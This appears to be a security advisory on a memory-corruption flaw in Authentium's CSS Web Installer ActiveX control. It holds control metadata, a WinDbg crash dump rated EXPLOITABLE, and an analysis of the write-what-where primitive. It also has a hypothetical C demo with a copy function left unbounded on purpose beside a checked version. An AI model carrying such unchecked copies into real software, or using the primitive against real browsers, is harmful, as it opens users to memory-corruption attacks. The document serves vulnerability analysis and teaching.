Authentium Command Free Scan ActiveX Control Memory corruption Exploit

Author: Nikolas Sotiriu (lofi)
Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt

Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.

ActiveX Control Information:

Name:            CSS Web Installer Class
Prog ID:         CSSWEBLib.Installer
Vendor:          Authentium, Inc.
Type:            ActiveX-Control
Version:         1.4.9508.605
GUID:            {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:            cssweb.dll
Folder:          C:\WINDOWS\Downloaded Program Files\
Safe for Script: True
Safe for Init:   True
IObjectSafety:   False

Note: "Safe for Script/Init: True" together with "IObjectSafety: False" means the control declares itself safe through the Component Categories registry keys rather than by implementing IObjectSafety. Either way, Internet Explorer will instantiate and script it from a web page without a prompt unless the CLSID is kill-bitted, which is what makes a scriptable memory-corruption bug in it reachable from a browser.

Test Information:

- Windows XP SP3 IE7 Ger

M$ Exploitability Information (WinDbg + MSEC !exploitable)

(158.968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242
eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll -
cssweb!DllUnregisterServer+0x37a3:
1000c1a9 8917            mov     dword ptr [edi],edx  ds:0023:42424242=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.

0:005> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x42424242
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0x223e0447.0x22676030

Stack Trace:
cssweb!DllUnregisterServer+0x37a3
cssweb!DllUnregisterServer+0x22d8
mshtml!CFontCache::GetBaseCcs+0x1bd
mshtml!CStr::Set+0x1b
mshtml!COneRun::Clone+0x87
Instruction Address: 0x000000001000c1a9

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030)

User mode write access violations that are not near NULL are exploitable.

Reading the dump: the faulting instruction is "mov dword ptr [edi],edx" with edi=42424242 and edx=41414141, the classic 'BBBB'/'AAAA' marker values. That is consistent with both operands of the store coming from the supplied input, i.e. an attacker-chosen dword written to an attacker-chosen address (a write-what-where primitive), which is why !exploitable rates it EXPLOITABLE rather than merely a crash. Two caveats when reading the trace: no PDB is available for cssweb.dll, so "DllUnregisterServer+0x37a3" is only the nearest exported symbol and says nothing about which function is really executing; and the mshtml frames below it are resolved the same way, so they should not be taken as a reliable call path either.
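To make the crash pattern concrete, the following is an added, hypothetical model of a record whose length-unchecked copy lets input spill into a destination/value pair that is later used like "mov [edi],edx". It is not the cssweb.dll code and does not claim to show the real bug; the struct layout, field names, the 'X' filler and the 64 KiB "near NULL" boundary are all assumptions made for the demonstration. It shows the unchecked copy next to a bounded one and checks the outcome against the edi/edx values from the dump.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical record layout (assumption, not cssweb.dll): a fixed-size
 * text field followed by the address and value of a later dword store. */
struct install_rec {
    char     name[16];   /* caller-supplied string lands here             */
    uint32_t dst_addr;   /* models edi: where the later store goes         */
    uint32_t val;        /* models edx: what the later store writes        */
};

#define MARK_A 0x41414141u   /* 'AAAA', the value seen in edx in the dump   */
#define MARK_B 0x42424242u   /* 'BBBB', the address seen in edi in the dump */

/* Vulnerable: trusts the caller's length and never compares it with
 * sizeof(name), so bytes 16..23 overwrite dst_addr and val. The copy is
 * done through a pointer into the whole record so the demo stays within
 * the object for len <= sizeof *r. */
static void set_name_unchecked(struct install_rec *r,
                               const unsigned char *src, size_t len)
{
    unsigned char *dst = (unsigned char *)r + offsetof(struct install_rec, name);
    for (size_t i = 0; i < len; i++)   /* no bound on len */
        dst[i] = src[i];
}

/* Hardened: reject input that does not fit, leaving the record untouched. */
static int set_name_checked(struct install_rec *r,
                            const unsigned char *src, size_t len)
{
    if (len >= sizeof r->name)         /* keep room for the terminator */
        return -1;
    memcpy(r->name, src, len);
    r->name[len] = '\0';
    return 0;
}

/* Constructed input (assumption): 16 filler bytes, then the dwords that
 * land in dst_addr and val. Both markers are byte-symmetric, so the
 * result does not depend on endianness. */
static size_t build_input(unsigned char *out, size_t cap)
{
    if (cap < sizeof(struct install_rec))
        return 0;
    uint32_t b = MARK_B, a = MARK_A;
    memset(out, 'X', sizeof ((struct install_rec *)0)->name);
    memcpy(out + offsetof(struct install_rec, dst_addr), &b, sizeof b);
    memcpy(out + offsetof(struct install_rec, val), &a, sizeof a);
    return sizeof(struct install_rec);
}

struct outcome {
    int      rejected;   /* 1 if the checked copy refused the input */
    uint32_t dst_addr;   /* record fields after the copy            */
    uint32_t val;
};

/* Run the constructed input through the unchecked (0) or checked (1) copy. */
static struct outcome run_copy(int hardened)
{
    unsigned char input[sizeof(struct install_rec)];
    size_t len = build_input(input, sizeof input);
    struct install_rec r;
    struct outcome o = {0, 0, 0};
    memset(&r, 0, sizeof r);
    if (hardened)
        o.rejected = set_name_checked(&r, input, len) < 0;
    else
        set_name_unchecked(&r, input, len);
    o.dst_addr = r.dst_addr;
    o.val = r.val;
    return o;
}

/* The rule quoted by !exploitable: a user-mode write AV not near NULL is
 * EXPLOITABLE. The 64 KiB boundary used here is an assumption. */
static int write_av_far_from_null(uint32_t fault_addr)
{
    return fault_addr >= 0x10000u;
}

int main(void)
{
    struct outcome bad = run_copy(0), good = run_copy(1);
    printf("unchecked: dst=%08x val=%08x -> later store is mov [%08x],%08x\n",
           bad.dst_addr, bad.val, bad.dst_addr, bad.val);
    printf("checked:   rejected=%d dst=%08x val=%08x\n",
           good.rejected, good.dst_addr, good.val);
    printf("write AV at %08x far from NULL: %d\n",
           bad.dst_addr, write_av_far_from_null(bad.dst_addr));
    return 0;
}
```

The unchecked path ends with dst_addr=0x42424242 and val=0x41414141, exactly the edi/edx pair in the dump, so the later store would be a fully controlled write; the checked path refuses the input and both fields stay zero.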